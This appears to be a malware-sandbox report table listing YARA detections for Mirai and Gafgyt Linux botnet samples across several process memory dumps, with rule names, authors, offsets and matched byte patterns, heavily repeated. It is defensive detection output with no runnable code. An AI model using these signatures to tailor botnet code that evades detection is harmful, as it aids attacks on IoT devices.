6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6249.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6239.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6239.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6243.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6243.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6243.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6242.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6242.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6239.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6241.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6246.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6241.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6241.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6246.1.0000000008048000.000000000805b000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
